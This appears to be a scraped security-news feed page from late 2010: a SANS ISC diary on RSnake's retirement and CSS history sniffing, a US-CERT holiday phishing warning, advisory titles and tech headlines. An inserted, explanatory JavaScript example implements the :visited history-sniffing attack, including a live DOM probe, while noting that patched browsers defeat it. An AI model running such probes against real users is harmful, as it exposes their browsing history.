InfoSec News

So as it's my first shift as handler of the day, I was worried whether I would be able to live up to the bar the handlers have set in diaries and days past. This started a train of thought that was accelerated by Robert "RSnake" Hansen's 1000th and final post on http://ha.ckers.org today. I am sure that everyone reading this is aware of who Robert is, but in case you have been under a rock for the last many years or are just not involved in web application security: Robert is one of the giants upon whose shoulders we all stand. Robert has helped cause XSS, SQLi and XSRF to become terms that the business people we deal with understand. He has also fostered an environment where people share tips and tricks and encourage each other to become better.

In his last blog post on the site, Robert discusses how he needs to follow his happiness and that this is the main reason he is stepping out of the limelight. (Yes, this blog post does continue the light shining on him a bit, but I think it's OK this once.) He brings up a point that is one I have discussed with many people: what happens when this isn't fun anymore? While I am sure that rooting boxes and yanking data through a web application will cause me to giggle for years into the future, how do we ensure that the people we have managing and monitoring our security are still enjoying what they do?

It's also funny that this comes up at the same time that the mainstream news outlets are discussing the use of the history browsing attacks using JavaScript and CSS. This is an attack we have discussed for a long while now, but since it's been found in the wild being used by advertising and adult sites, maybe we will see some more movement on fixing it.

Thoughts?

Kevin Johnson
Secure Ideas
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
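As an added example that is not part of Kevin's diary, of ha.ckers.org, or of any browser vendor's code, the JavaScript below shows the mechanics of the CSS :visited history-sniffing attack the diary refers to: style visited links distinctively, create a link per URL you want to test, and read the computed colour back from script. The candidate URL list, the victim history and the two simulated browsers (one that leaks, one that lies to script the way patched browsers do) are constructed for illustration; only makeDomProbe() touches a real DOM.

```javascript
// Added example (not from the ISC diary above): CSS :visited history sniffing.
// The URL list, the browsing history and the simulated browsers below are
// constructed for illustration; only makeDomProbe() uses a real DOM.
//
// Mechanics: the attacker's page styles visited links with a distinctive
// colour, creates an <a> for every URL it wants to test, and asks the browser
// for each link's computed colour. On a browser that answers honestly, the
// colour reveals whether the URL is in the victim's history.

const LINK_COLOR = 'rgb(0, 0, 255)';
const VISITED_COLOR = 'rgb(255, 0, 0)';
const PROBE_CSS =
  `a.probe:link { color: ${LINK_COLOR}; } a.probe:visited { color: ${VISITED_COLOR}; }`;

// Core of the attack, kept free of DOM calls so it can run against a simulated
// browser: report every candidate whose computed colour is the :visited one.
function sniffHistory(candidateUrls, computedColor) {
  return candidateUrls.filter((url) => computedColor(url) === VISITED_COLOR);
}

// Probe for a real browser. Mozilla's 2010 fix (shipped in Firefox 4) and
// similar changes in other browsers make getComputedStyle() report the :link
// colour regardless of history, so on a patched browser this finds nothing.
function makeDomProbe(doc) {
  const style = doc.createElement('style');
  style.textContent = PROBE_CSS;
  doc.head.appendChild(style);
  return (url) => {
    const a = doc.createElement('a');
    a.className = 'probe';
    a.href = url;
    doc.body.appendChild(a);
    const color = doc.defaultView.getComputedStyle(a).color;
    doc.body.removeChild(a);
    return color;
  };
}

// Simulated browsers (constructed for this example, not real engine code).
// An unpatched 2010-era browser leaks history through the computed colour...
function makeLeakyBrowser(history) {
  return (url) => (history.has(url) ? VISITED_COLOR : LINK_COLOR);
}
// ...while a patched browser lies to script and always returns the :link colour.
function makePatchedBrowser(_history) {
  return (_url) => LINK_COLOR;
}

// Constructed inputs: URLs an advertiser or adult site might test for, and a
// victim history that contains two of them.
const CANDIDATES = [
  'https://bank.example/login',
  'https://webmail.example/',
  'https://adult.example/',
  'https://competitor.example/pricing',
];
const VICTIM_HISTORY = new Set(['https://bank.example/login', 'https://adult.example/']);

// Runs the same probe logic against both simulated browsers.
function demo() {
  return {
    leaky: sniffHistory(CANDIDATES, makeLeakyBrowser(VICTIM_HISTORY)),
    patched: sniffHistory(CANDIDATES, makePatchedBrowser(VICTIM_HISTORY)),
  };
}

if (typeof document !== 'undefined') {
  // Real browser: run the probe against the actual history.
  console.log('visited:', sniffHistory(CANDIDATES, makeDomProbe(document)));
} else {
  console.log(demo());
}
```

Run it in Node to see the leaky browser give up the two visited URLs while the patched one reports none; paste it into a page in a browser to see what that browser actually returns. The fix browsers adopted is the one the patched simulation models: script-visible style queries answer as if every link were unvisited, so the page can still colour visited links but can no longer read the result back.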
 
The U.S. General Services Administration will become the first federal agency to use a hosted e-mail service, choosing Google, Unisys and others to offer the service.
 
Verizon Wireless is undercutting its own 3G plans with pricing for the LTE network scheduled to go live on Sunday, possibly marking the beginning of a fight to capture high-speed wireless subscribers.
 
With the ink still damp on the Small Business Jobs Act of 2010, small business owners are already feeling more confident as this difficult year draws to a close.
 
SAP's High-Performance Analytic Appliance, or HANA, which started shipping on Wednesday, should give its customers a much faster, more flexible way to analyze large volumes of data in real-time, analysts said.
 
Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
 
The freshly Microsoft-funded TurboHercules offers an emulator to run IBM mainframe OSes on x86 servers
 
Tablets will slowly gain acceptance in the enterprise, and in the long term could possibly replace laptops as a primary computing device, a Dell executive said this week.
 
The traditional port-based enterprise firewall, now looking less like a guard and more like a pit stop for Internet applications racing in through the often open ports 80 and 443, is slowly losing out to a new generation of brawny, fast, intelligent firewalls.
 
Verizon Wednesday laid down some important markers that AT&T and T-Mobile will try to match or best when they launch their own LTE networks next year
 
Every year, I try to predict the top trends in security for the upcoming year. To give myself a sense of accountability I always look back at how well those predictions worked out and either abandon them or double-down for the next year! It's time to test my annual security predictions for 2010.
 
Perl CGI.pm 'multipart/x-mixed-replace' MIME Boundary HTTP Response Splitting Vulnerability
 
OpenJDK 'IcedTea' plugin (CVE-2010-3860) Unspecified Information Disclosure Vulnerability
 

Fed Infosec Spending Seen Rising By 9% a Year (GovInfoSecurity.com)
The federal government will spend $13.3 billion on cybersecurity wares from vendors by 2015, an annual growth topping 9 percent over the next five years, ...
 
ISC BIND Key Algorithm Rollover Security Vulnerability
 
ISC BIND 9 'RRSIG' Record Type Negative Cache Remote Denial of Service Vulnerability
 
Less than a week after they released software that unlocked Windows Phone 7 (WP7) smartphones to let users install unauthorized applications, three developers have yanked the tool from distribution.
 
Amazon has pulled the plug on WikiLeaks, the site that earlier this week began releasing a mammoth collection of confidential U.S. State Department diplomatic cables.
 
After months of delays, Google will launch its e-book retail business, called Google Editions, in the U.S. before the end of the year, a Google spokesman confirmed.
 
Searches on the oil spill in the Gulf of Mexico, the World Cup, teenage pop star Miley Cyrus and Lady Gaga made Yahoo's top 10 list of most popular online searches.
 
[SECURITY] [DSA-2129-1] New krb5 packages fix checksum verification weakness
 
[SECURITY] [DSA-2128-1] New libxml2 packages fix potential code execution
 
With the US holiday season quickly approaching and the excitement being generated with topics like WikiLeaks and the change to the US Government soon to take place (new Speaker of the House, etc.), I felt it might be a good time to gently remind our readers not to click too quick. Every year around this time we start seeing a barrage of emails trying to trick unsuspecting recipients into getting the latest gossip or viewing that e-greeting card, and the next thing we know we have a whole bunch of new spam zombies or other backdoor trojans out clogging up the works. US-CERT has issued a reminder to this effect with some really good advice on what to watch out for and things you need to know to protect your computer. So proceed with caution but have lots of fun.
Thanks to Sean for providing this information from US-CERT.
Holiday Season Phishing Scams and Malware Campaigns
added November 18, 2010 at 02:17 pm

In the past, US-CERT has received reports of an increased number of phishing scams and malware campaigns that take advantage of the winter holiday and holiday shopping season. US-CERT reminds users to remain cautious when receiving unsolicited email messages that could be part of a potential phishing scam or malware campaign.

These phishing scams and malware campaigns may include but are not limited to the following:
electronic greeting cards that may contain malware
requests for charitable contributions that may be phishing scams and may originate from illegitimate sources claiming to be charities
screensavers or other forms of media that may contain malware
credit card applications that may be phishing scams or identity theft attempts
online shopping advertisements that may be phishing scams or identity theft attempts from bogus retailers

US-CERT encourages users and administrators to use caution when encountering these types of email messages and take the following preventative measures to protect themselves from phishing scams and malware campaigns:
Do not follow unsolicited web links in email messages.
Use caution when opening email attachments. Refer to the Using Caution with Email Attachments Cyber Security Tip for more information on safely handling email attachments.
Maintain up-to-date antivirus software.
Review the Federal Trade Commission's Charity Checklist.
Verify charity authenticity through a trusted contact number. Trusted contact information can be found on the Better Business Bureau National Charity Report Index.
Refer to the Recognizing and Avoiding Email Scams (pdf) document for more information on avoiding email scams.
Refer to the Avoiding Social Engineering and Phishing Attacks Cyber Security Tip for more information on social engineering attacks.
Refer to the Shopping Safely Online Cyber Security Tip for more information on online shopping safety.

Deb Hale, Long Lines, LLC
 

Amazon.com Drops Wikileaks (ReadWriteWeb)
The security blog Infosec Island has conducted interviews with him about his methods and motivations. On Sunday, The Jester tweeted "If I was a wikileaks ...
Related coverage: WikiLeaks Hit By Another Massive DDoS Hacker Attack (Fast Company); Lone hacker theory in Wikileaks DDoS attack (Register)
 
The FTC endorses a national do-not-track list to protect consumers online.
 
Verizon Wireless will launch its faster Long Term Evolution (LTE) wireless network in 38 cities on Sunday, with an initial focus on business users who deploy LTE over new $100 USB modems connected to laptops.
 
Take a look back at the pros and cons of life before HDTV, Facebook and Wi-Fi. You do remember life before texting, don't you?
 
[USN-1025-1] Bind vulnerabilities
 
Vulnerabilities in Fabrica Engine
 
Razer, the guys who make all sorts of crazy game-logo-festooned computer peripherals, were kind enough to send over a minor trove of StarCraft II kit to evaluate. More, in fact, than I asked for, including an official StarCraft II Zerg Edition Messenger Bag. Did you know there's an official StarCraft II bag? Neither did I.
 
Apple's iPhone and Research in Motion's BlackBerry are in a dead heat for U.S. smartphone ownership honors, Nielsen said today.
 
Holiday shoppers on Cyber Monday spent more than $1 billion online, a new record, according to a report from ComScore, an online research firm.
 
Verizon Wireless on Wednesday said its wireless high speed LTE (Long Term Evolution) network will become available in 38 cities on Dec. 5.
 
The GNU repository was compromised by a SQL Injection attack last week.
 
D-Link DIR-300 'tools_admin.php' Security Bypass Vulnerability
 
The FCC's chairman outlines a proposal on net neutrality and pushes for a vote Dec. 21.
 
McAfee VirusScan Enterprise 'traceapp.dll' DLL Loading Arbitrary Code Execution Vulnerability
 
Re: D-Link DIR-300 authentication bypass
 
Dell today resumed selling its Venue Pro smartphone, three weeks after halting sales over concerns about problematic Wi-Fi connections and mislabeled batteries.
 
Apple's app removal processes have always been a little blurry, but over the Thanksgiving holiday, the company made one point clear: The App Store is no place for homophobia.
 
AirPlay, one of the main feature additions in iOS 4.2, could soon work with third-party apps and Safari, according to a purported Steve Jobs e-mail that a reader sent to the MacRumors blog. The e-mail suggests that in 2011 users will be able to stream video to their Apple TVs from third-party applications and the Safari browser.
 
The Sonatype Professional suite is built for Java developers and helps minimize bugs while maximizing software reuse
 
Digitalus 1.10.0 Alpha2 Arbitrary File Upload vulnerability.txt
 
Secunia Research: Winamp NSV Table of Contents Parsing Integer Overflow
 
[eVuln.com] Multiple XSS in Alguest
 
Cisco plans to acquire Linsider for its engineers, rapid provisioning tools
 
The FCC is scheduled to vote on net neutrality rules during its Dec. 21 meeting.
 
Microsoft's Internet Explorer browser again lost usage share last month to rivals Google and Apple, posting its largest decline since March, a Web analytics firm said.
 
[ MDVSA-2010:246 ] krb5
 
[ MDVSA-2010:245 ] krb5
 
CORE-2010-1109 - Multiple vulnerabilities in BugTracker.Net
 
A vulnerability in the ESX 4.1 hypervisor could enable a local attacker to gain additional privileges.

McAfee released Security Bulletin SB10013 this morning. The bulletin pertains to a potential code execution vulnerability in VirusScan Enterprise 8.5i and earlier versions. According to the information from McAfee, they are investigating the publicly disclosed security issue and will publish a hotfix as soon as the investigation is complete. They have listed this as a Severity Rating of Medium. For more information and to check for the hotfix, keep an eye on kc.mcafee.com/corporate/index.
Deb Hale, Long Lines, LLC
 
Interpol has issued a so-called "red notice" for Wikileaks' Julian Assange, notifying police around the world that he is wanted for questioning by Swedish prosecutors related to sexual assault accusations.
 
Apple has been awarded a patent for a display system that would allow multiple viewers to see a high-quality 3D image projected on a screen without the need for special glasses, regardless of where they are sitting.
 
Groupon, the Internet deal site that Google reportedly plans to buy for $5 billion, expanded in Asia by buying three websites in the region for an undisclosed sum.
 
Another day, another quarter of a million confidential government documents released via WikiLeaks.
 
If you provide or allow employees an iPad, here are the productivity apps that you should install on them
 
Is your iPad acting up? Our tips can help fix frozen screens, syncing problems, Wi-Fi woes and more -- or just improve your iPad experience.
 
MIT Kerberos 5 Key Distribution Center 'KrbFastReq' Forgery Security Bypass Vulnerability
 
Nobel Prize winner and U.S. Secretary of Energy Steven Chu Tuesday bluntly warned that the U.S. is in danger of losing its leadership in the development and export of high technology products.
 
ArtistScope Link Protect Multiple HTML Injection Vulnerabilities
 
HP Data Protector Manager Remote Denial of Service Vulnerability
 
InfoSec News: 'Hacktivist' takes credit for WikiLeaks attacks via Twitter: http://latimesblogs.latimes.com/technology/2010/11/hacktivist-takes-credit-for-wikileaks-attacks-via-twitter.html
By Nathan Olivarez-Giles Los Angeles Times November 30, 2010
A self-proclaimed "hacktivist" is apparently taking some credit for the Internet attacks that shut down many pages on WikiLeaks.org today.
The hacker, who goes by the name Jester, claims on his blog to have used distributed denial of service attacks to bring down websites in the past. Jester often claims responsibility for bringing down websites on his Twitter account using the phrase "tango down," which is used by the military to indicate that an enemy has been eliminated in a firefight.
Today, he sent multiple tweets directed at WikiLeaks:
[...]
 
InfoSec News: FDIC's IT Systems at Elevated Risk: http://www.govinfosecurity.com/articles.php?art_id=3138
Gov Info Security November 30, 2010
The Federal Deposit Insurance Corp. has worked hard to implement IT security procedures to safeguard its financial systems, but despite those efforts, the FDIC faces an elevated risk of the misuse of federal assets.
That's according to Tuesday's Government Accountability Office report, Federal Deposit Insurance Corporation Needs to Mitigate Control Weaknesses, that also cited unauthorized modification or destruction of financial information, inappropriate disclosure of other sensitive information and disruption of critical operations that put the FDIC systems at risk.
FDIC also failed to sufficiently implement access and other controls intended to protect the confidentiality, integrity and availability of its financial systems and information. For example, GAO said, the FDIC didn't always:
[...]
 
InfoSec News: Analyst finds flaws in Canon image verification system: http://www.networkworld.com/news/2010/113010-analyst-finds-flaws-in-canon.html
By Jeremy Kirk IDG News Service November 30, 2010
A cryptographic system used by Canon to ensure that digital images haven't been altered is flawed and can't be fixed, according to a Russian security company that specializes in encryption.
Mid- to high-end Canon digital cameras have a feature called "Original Decision Data" (ODD), which is a digital [...]
 
InfoSec News: WikiLeaks Missives Contain Many Tech Secrets: http://www.informationweek.com/news/government/security/showArticle.jhtml?articleID=228400240
By J. Nicholas Hoover InformationWeek November 30, 2010
The cache of more than 250,000 sensitive diplomatic cables acquired by WikiLeaks, only a fraction of which have been released, appears to contain many details on the technology and Internet policies, cybersecurity practices, and IT systems of the U.S. government and other countries. [...]
 
InfoSec News: Free software repository brought down in hack attack: http://www.theregister.co.uk/2010/12/01/gnu_savannah_hacked/
By Dan Goodin in San Francisco The Register 1st December 2010
The main source-code repository for the Free Software Foundation has been taken down following an attack that compromised some of the website's account passwords and may have gained unfettered administrative access.
The SQL-injection attacks on GNU Savannah exploited holes in Savane, the open-source software hosting [...]
 
Nvidia and Intel together asked a Delaware court to postpone the start of a trial between the two chip makers until next year as they continue to seek a settlement, Nvidia's CEO said Wednesday. The trial had been scheduled for Dec. 6.
 
As part of a new push to weed out piracy in the country, China will inspect central and local government computers to ensure all the departments are using copyrighted software.
 






